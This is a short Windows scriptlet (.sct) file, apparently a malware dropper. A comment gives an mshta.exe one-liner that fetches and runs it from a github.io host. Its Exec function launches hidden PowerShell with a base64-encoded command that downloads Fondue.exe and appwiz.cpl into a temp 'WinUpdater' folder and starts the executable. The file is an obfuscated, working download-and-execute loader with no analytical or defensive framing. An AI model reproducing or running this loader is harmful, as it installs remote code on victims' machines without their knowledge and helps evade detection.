<?XML version="1.0"?>
<scriptlet>
  <!-- Test -->
  <!-- mshta.exe javascript:a=(GetObject("script:https://hakkyahud.github.io/update.sct")).Exec();close(); -->

<registration
    description="HakkYahud"
    progid="HakkYahud"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run('powershell -WindowStyle hidden -enc "TgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAFcAaQBuAFUAcABkAGEAdABlAHIAIgAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAOwBpAHcAcgAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8ALwBoAGEAawBrAHkAYQBoAHUAZAAuAGcAaQB0AGgAdQBiAC4AaQBvAC8ARgBvAG4AZAB1AGUALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAFcAaQBuAFUAcABkAGEAdABlAHIAXABGAG8AbgBkAHUAZQAuAGUAeABlACIAOwBpAHcAcgAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8ALwBoAGEAawBrAHkAYQBoAHUAZAAuAGcAaQB0AGgAdQBiAC4AaQBvAC8AYQBwAHAAdwBpAHoALgBjAHAAbAAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAFcAaQBuAFUAcABkAGEAdABlAHIAXABhAHAAcAB3AGkAegAuAGMAcABsACIAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAFcAaQBuAFUAcABkAGEAdABlAHIAXABGAG8AbgBkAHUAZQAuAGUAeABlACIAOwA="')
	}

]]>
</script>

</scriptlet>
